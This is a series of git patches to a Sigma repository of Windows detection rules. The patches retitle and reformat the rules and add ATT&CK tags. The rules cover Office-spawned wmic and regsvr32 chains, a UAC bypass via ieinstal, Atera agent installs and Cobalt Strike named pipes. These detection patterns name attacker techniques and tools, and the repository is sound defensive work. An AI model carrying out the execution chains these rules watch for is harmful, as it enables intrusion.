https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: product: windows - service: sysmon category: process_creation detection: - description: Add more office applications to the rule logic of choice + #useful_information: Add more office applications to the rule logic of choice selection1: - EventLog: Microsoft-Windows-Sysmon/Operational EventID: 1 selection2: - Image: '\wbem\WMIC.exe' @@ -33,5 +31,5 @@ detection: - powerpnt.exe condition: selection1 AND selection2 AND selection3 falsepositives: -- "" -level: high \ No newline at end of file +- Unknown +level: high From 93334878f50bb381263e89b0284d164c9797b2d5 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:09:57 -0600 Subject: [PATCH 0659/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. --- ...ocess_Creations_by_Office_applications.yml | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index 6b77a997..ee577373 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,15 +1,15 @@ -title: Monitor LOLBins Process Creations by Office applications (Security Event Logs) +title: Created Executables and Script Files By Office Applications description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: @@ -17,7 +17,7 @@ logsource: service: security category: process_creation detection: - description: add more LOLBins to the rules logic of your choice. + #useful_information: add more LOLBins to the rules logic of your choice. selection1: EventLog: security EventID: 4688 @@ -35,5 +35,5 @@ detection: - powerpnt.exe condition: selection1 AND selection2 AND selection3 falsepositives: -- "" -level: high \ No newline at end of file +- Unknown +level: high From d309784e58cb4b2b4a9695affc3f9c9cb6fe8e6a Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:12:34 -0600 Subject: [PATCH 0660/1367] Updated Rule Modified Title --- ...Monitor_LOLBins_Process_Creations_by_Office_applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index ee577373..009f56a8 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,4 +1,4 @@ -title: Created Executables and Script Files By Office Applications +title: Created Executables and Files by Office Applications description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From c5507658c0c91a75b24e182bced350ae80905e2d Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:13:31 -0600 Subject: [PATCH 0661/1367] Updated Rule updated title --- ...es_creation_by_Office_applications_using_file_extentions.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 6f73f778..81a3348f 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,4 +1,4 @@ -title: Created Executables and Script Files By Office Applications +title: Created Executables and Files by Office Applications description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From 1b9a0c4a01f8830f70a8d67e67eeeead64d6b185 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:20:17 -0600 Subject: [PATCH 0662/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. --- ...creations_with_Wmiprvse_parent_process.yml | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 90d5557e..62db1db1 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -1,15 +1,15 @@ -title: LOLBins process creations with Wmiprvse parent process. (Security Event Logs) +title: Lolbins Process Creation with WmiPrvse description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: @@ -17,7 +17,7 @@ logsource: service: security category: process_creation detection: - description: add more LOLBins to the rules logic of your choice. + #useful_information: add more LOLBins to the rules logic of your choice. selection1: EventLog: security EventID: 4688 @@ -33,5 +33,5 @@ detection: - "\\wbem\\WmiPrvSE.exe" condition: selection1 AND selection2 AND selection3 falsepositives: -- "" -level: high \ No newline at end of file +- Unknown +level: high From 0d2257fb197e61cb0edf089e824b0ecb4e148a49 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:22:01 -0600 Subject: [PATCH 0663/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. --- ..._proxy executing_regsvr32_with_payload.yml | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml index b54db391..2de29b7e 100644 --- a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml +++ b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml @@ -1,15 +1,15 @@ -title: Monitor Excel from proxy executing regsvr32 with payload (Security Event Logs) +title: Excel Proxy Executing Regsvr32 With Payload description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: @@ -43,5 +43,5 @@ detection: - 'call' condition: selection1 AND selection2 AND selection3 AND selection4 AND selection5 falsepositives: -- "" -level: high \ No newline at end of file +- Unknown +level: high From f2b8b83fe3fd9f56d947e50939a49173b090de20 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:23:45 -0600 Subject: [PATCH 0664/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. --- ...Applications_Spawning_WMI_command-line.yml | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml index df25ef11..845e84e2 100644 --- a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml @@ -1,15 +1,15 @@ -title: Office Applications Spawning WMI command-line (Security Event Logs) +title: Office Applications Spawning Wmi Cli description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: @@ -17,7 +17,7 @@ logsource: service: security category: process_creation detection: - description: Add more office applications to the rule logic of choice + #useful_information: Add more office applications to the rule logic of choice selection1: - EventLog: security selection2: @@ -32,5 +32,5 @@ detection: - powerpnt.exe condition: selection1 AND selection2 AND selection3 AND selection4 falsepositives: -- "" -level: high \ No newline at end of file +- Unknown +level: high From e7c7e4c0614c1df35fb029a24c5d2601be894a9a Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:24:28 -0600 Subject: [PATCH 0665/1367] Updated Rule Detection changed to #useful_information --- ...e_Application_from_proxy executing_regsvr32_with_payload.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml index 2de29b7e..6842e7ca 100644 --- a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml +++ b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml @@ -17,7 +17,7 @@ logsource: service: security category: process_creation detection: - description: add more LOLBins to the rules logic of your choice. + #useful_information: add more LOLBins to the rules logic of your choice. selection1: EventLog: security EventID: 4688 From e0e1396dffd48408b984dff37862e90dad46f511 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:26:44 -0600 Subject: [PATCH 0666/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. --- ...mmand_execution_by_Office_Applications.yml | 26 +++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml index 565467ed..0b20eece 100644 --- a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml +++ b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml @@ -1,22 +1,22 @@ -title: Monitor WMI "Win32_Process::Create" command execution by Office Applications. -description: Initial execution of malicious document calls wmic to execute the file with regsvr32 +title: WMI Command Execution by Office Applications +description: Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32 references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: product: EndPoint Detection Logs category: process_creation detection: - description: Add more office applications to the rule logic of choice + #useful_information: Add more office applications to the rule logic of choice selection1: EventLog: EDR EventType: WMIExecution @@ -28,5 +28,5 @@ detection: - '*\powerpnt.exe' condition: selection1 AND selection2 falsepositives: -- "" -level: high \ No newline at end of file +- Unknown +level: high From 470d64e66cb1114341eded853155ceed2bc17835 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Tue, 31 Aug 2021 22:28:34 -0600 Subject: [PATCH 0667/1367] Updated Rule Completed the following updates on the rule: - Modified the title - incremented 4 spaces for references and tags - updated false positives - updated author - updated description in detection section. --- ...ice_applications_using_file_extentions.yml | 24 +++++++++---------- 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index c4293b6a..e2411d65 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,15 +1,15 @@ -title: monitor executable and script files creation by Office applications, using file extensions and Magic Bytes (EDR). +title: Executable and Files creation by Office Applications description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. references: -- https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ -- https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Idea by: Vadim Khrykov" + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ + - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml +author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" tags: -- attack.t1204.002 -- attack.t1047 -- attack.t1218.010 -- attack.execution -- attack.defence_evasion + - attack.t1204.002 + - attack.t1047 + - attack.t1218.010 + - attack.execution + - attack.defence_evasion status: experimental Date: 2021/23/8 logsource: @@ -17,7 +17,7 @@ logsource: service: Sysmon category: process_creation detection: - description: Please add more file extentions and magic bytes to the logic of your choice. + #useful_information: Please add more file extentions and magic bytes to the logic of your choice. selection1: EventType: - FileCreate @@ -45,5 +45,5 @@ detection: - "4D5A" condition: selection1 AND selection2 AND (selection3 OR selection4) falsepositives: -- "" -level: high \ No newline at end of file +- Unknown +level: high From 6f3fc7036e69b1af20005213ab55540f783d23b6 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 1 Sep 2021 09:45:31 +0200 Subject: [PATCH 0668/1367] Update tags --- rules/windows/malware/av_hacktool.yml | 2 ++ rules/windows/powershell/powershell_invoke_nightmare.yml | 2 ++ 2 files changed, 4 insertions(+) diff --git a/rules/windows/malware/av_hacktool.yml b/rules/windows/malware/av_hacktool.yml index fe2fa7cf..e074241f 100644 --- a/rules/windows/malware/av_hacktool.yml +++ b/rules/windows/malware/av_hacktool.yml @@ -23,3 +23,5 @@ fields: falsepositives: - Unlikely level: high +tags: + - attack.execution \ No newline at end of file diff --git a/rules/windows/powershell/powershell_invoke_nightmare.yml b/rules/windows/powershell/powershell_invoke_nightmare.yml index a98b9bba..553f535e 100644 --- a/rules/windows/powershell/powershell_invoke_nightmare.yml +++ b/rules/windows/powershell/powershell_invoke_nightmare.yml @@ -19,3 +19,5 @@ detection: falsepositives: - Unknown level: high +tags: + - attack.privilege_escalation From 240c5584ffa6e8e54f64dedfbdcba30ddcc780c3 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 1 Sep 2021 09:56:46 +0200 Subject: [PATCH 0669/1367] update tags --- rules/windows/malware/av_relevant_files.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/rules/windows/malware/av_relevant_files.yml b/rules/windows/malware/av_relevant_files.yml index c200959a..fb82c313 100644 --- a/rules/windows/malware/av_relevant_files.yml +++ b/rules/windows/malware/av_relevant_files.yml @@ -72,3 +72,6 @@ fields: falsepositives: - Unlikely level: high +tags: + - attack.resource_development + - attack.t1588 \ No newline at end of file From 9ffdced740a0380f642a6c8ecaef5f22cb0044cc Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 1 Sep 2021 10:21:37 +0200 Subject: [PATCH 0670/1367] fix: implement suggestions from PR discussion --- rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml | 3 ++- rules/windows/process_creation/win_uac_bypass_ieinstal.yml | 3 ++- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml b/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml index 6e61f089..9ba625f0 100644 --- a/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml +++ b/rules/windows/file_event/sysmon_uac_bypass_ieinstal.yml @@ -20,5 +20,6 @@ detection: selection: Image: 'C:\Program Files\Internet Explorer\IEInstal.exe' TargetFilename|startswith: 'C:\Users\' - TargetFilename|endswith: '\AppData\Local\Temp\IDC1.tmp\[1]consent.exe' + TargetFilename|contains: '\AppData\Local\Temp\' + TargetFilename|endswith: 'consent.exe' condition: selection diff --git a/rules/windows/process_creation/win_uac_bypass_ieinstal.yml b/rules/windows/process_creation/win_uac_bypass_ieinstal.yml index a6458810..7c734ccf 100644 --- a/rules/windows/process_creation/win_uac_bypass_ieinstal.yml +++ b/rules/windows/process_creation/win_uac_bypass_ieinstal.yml @@ -22,5 +22,6 @@ detection: - 'High' - 'System' ParentImage|endswith: '\ieinstal.exe' - Image|endswith: '\AppData\Local\Temp\IDC1.tmp\[1]consent.exe' + Image|contains: '\AppData\Local\Temp\' + Image|endswith: 'consent.exe' condition: selection From 4b8ffbc183c597e448e8a1a09b7aeddbda3fd406 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 1 Sep 2021 10:30:43 +0200 Subject: [PATCH 0671/1367] Update tags --- rules/windows/malware/win_mal_ryuk.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/rules/windows/malware/win_mal_ryuk.yml b/rules/windows/malware/win_mal_ryuk.yml index 02603871..156ee19a 100644 --- a/rules/windows/malware/win_mal_ryuk.yml +++ b/rules/windows/malware/win_mal_ryuk.yml @@ -24,3 +24,6 @@ detection: falsepositives: - Unlikely level: critical +tags: + - attack.execution + - attack.t1204 From 892c58270a1985fe38ff9ca4875539d92c84c65e Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 1 Sep 2021 10:33:57 +0200 Subject: [PATCH 0672/1367] Update tags --- rules/windows/builtin/win_av_relevant_match.yml | 3 +++ rules/windows/malware/win_mal_darkside.yml | 3 +++ 2 files changed, 6 insertions(+) diff --git a/rules/windows/builtin/win_av_relevant_match.yml b/rules/windows/builtin/win_av_relevant_match.yml index fd321a9a..da2e8dce 100644 --- a/rules/windows/builtin/win_av_relevant_match.yml +++ b/rules/windows/builtin/win_av_relevant_match.yml @@ -36,3 +36,6 @@ detection: falsepositives: - Some software piracy tools (key generators, cracks) are classified as hack tools level: high +tags: + - attack.resource_development + - attack.t1588 \ No newline at end of file diff --git a/rules/windows/malware/win_mal_darkside.yml b/rules/windows/malware/win_mal_darkside.yml index 26d609be..e050210d 100644 --- a/rules/windows/malware/win_mal_darkside.yml +++ b/rules/windows/malware/win_mal_darkside.yml @@ -26,3 +26,6 @@ falsepositives: - Unknown - UAC bypass method used by other malware level: critical +tags: + - attack.execution + - attack.t1204 From 6859b6c38f4d748ee335a400998cb6ac6313ebc0 Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Wed, 1 Sep 2021 15:24:47 +0545 Subject: [PATCH 0673/1367] Added rule for detection of Atera RMM Agent installation --- .../win_software_atera_rmm_agent_install.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/windows/builtin/win_software_atera_rmm_agent_install.yml diff --git a/rules/windows/builtin/win_software_atera_rmm_agent_install.yml b/rules/windows/builtin/win_software_atera_rmm_agent_install.yml new file mode 100644 index 00000000..b3a7f22b --- /dev/null +++ b/rules/windows/builtin/win_software_atera_rmm_agent_install.yml @@ -0,0 +1,22 @@ +title: Atera Agent Installation +id: 87261fb2-69d0-42fe-b9de-88c6b5f65a43 +status: experimental +description: Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators +references: + - https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent +date: 2021/09/01 +author: Bhabesh Raj +level: high +logsource: + service: application + product: windows +tags: + - attack.t1219 +detection: + selection: + EventID: 1033 + Source: MsiInstaller + Message|contains: AteraAgent + condition: selection +falsepositives: + - Legitimate Atera agent installation \ No newline at end of file From 2cb5f5e4c64fbf3c837c47f632056d0f6e300518 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 1 Sep 2021 12:54:21 +0200 Subject: [PATCH 0674/1367] add missing tags --- rules/windows/builtin/win_ntfs_vuln_exploit.yml | 3 +++ .../windows/builtin/win_scm_database_privileged_operation.yml | 3 +++ rules/windows/builtin/win_susp_failed_guest_logon.yml | 3 +++ .../sysmon_susp_prog_location_network_connection.yml | 3 +++ 4 files changed, 12 insertions(+) diff --git a/rules/windows/builtin/win_ntfs_vuln_exploit.yml b/rules/windows/builtin/win_ntfs_vuln_exploit.yml index 3efcaf88..060a8262 100644 --- a/rules/windows/builtin/win_ntfs_vuln_exploit.yml +++ b/rules/windows/builtin/win_ntfs_vuln_exploit.yml @@ -20,3 +20,6 @@ detection: falsepositives: - Unlikely level: critical +tags: + - attack.impact + - attack.t1499.001 \ No newline at end of file diff --git a/rules/windows/builtin/win_scm_database_privileged_operation.yml b/rules/windows/builtin/win_scm_database_privileged_operation.yml index 9501875a..5c59eb7e 100644 --- a/rules/windows/builtin/win_scm_database_privileged_operation.yml +++ b/rules/windows/builtin/win_scm_database_privileged_operation.yml @@ -21,3 +21,6 @@ detection: falsepositives: - Unknown level: critical +tags: + - attack.privilege_escalation + - attack.t1548 \ No newline at end of file diff --git a/rules/windows/builtin/win_susp_failed_guest_logon.yml b/rules/windows/builtin/win_susp_failed_guest_logon.yml index 0d7657d5..7a6fae07 100644 --- a/rules/windows/builtin/win_susp_failed_guest_logon.yml +++ b/rules/windows/builtin/win_susp_failed_guest_logon.yml @@ -25,3 +25,6 @@ fields: - User falsepositives: - Account fallback reasons (after failed login with specific account) +tags: + - attack.credential_access + - attack.t1110.001 \ No newline at end of file diff --git a/rules/windows/network_connection/sysmon_susp_prog_location_network_connection.yml b/rules/windows/network_connection/sysmon_susp_prog_location_network_connection.yml index b8c4544d..f93c48f5 100755 --- a/rules/windows/network_connection/sysmon_susp_prog_location_network_connection.yml +++ b/rules/windows/network_connection/sysmon_susp_prog_location_network_connection.yml @@ -31,3 +31,6 @@ detection: falsepositives: - unknown level: high +tags: + - attack.command_and_control + - attack.t1105 \ No newline at end of file From 8bba246205fcc9ac6fd0e37cfc6e053bf14a3d3e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 12:57:34 +0200 Subject: [PATCH 0675/1367] refactor: better way to write it --- rules/windows/builtin/win_susp_msmpeng_crash.yml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/rules/windows/builtin/win_susp_msmpeng_crash.yml b/rules/windows/builtin/win_susp_msmpeng_crash.yml index 0dde4962..8cc330fb 100644 --- a/rules/windows/builtin/win_susp_msmpeng_crash.yml +++ b/rules/windows/builtin/win_susp_msmpeng_crash.yml @@ -22,11 +22,10 @@ detection: selection2: Source: 'Windows Error Reporting' EventID: 1001 - keyword1: + keywords: - 'MsMpEng.exe' - keyword2: - 'mpengine.dll' - condition: 1 of selection* and keyword1 and keyword2 + condition: 1 of selection* and all of keywords falsepositives: - MsMpEng.exe can crash when C:\ is full level: high From f102b2d9a1149458069931c41f20bbc786c29a44 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Wed, 1 Sep 2021 13:07:18 +0200 Subject: [PATCH 0676/1367] docs: note to improved sysmon config --- rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml | 2 +- rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml | 2 +- .../pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml index 3075d846..89612067 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike.yml @@ -16,7 +16,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself.' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' detection: selection_MSSE: PipeName|contains|all: diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml index 97b9e587..16305648 100644 --- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml +++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml @@ -13,7 +13,7 @@ tags: logsource: product: windows category: pipe_created - definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself.' + definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself or use this extended version that logs the Named Pipes used in this Sigma repo (https://github.com/Neo23x0/sysmon-config)' detection: selection: 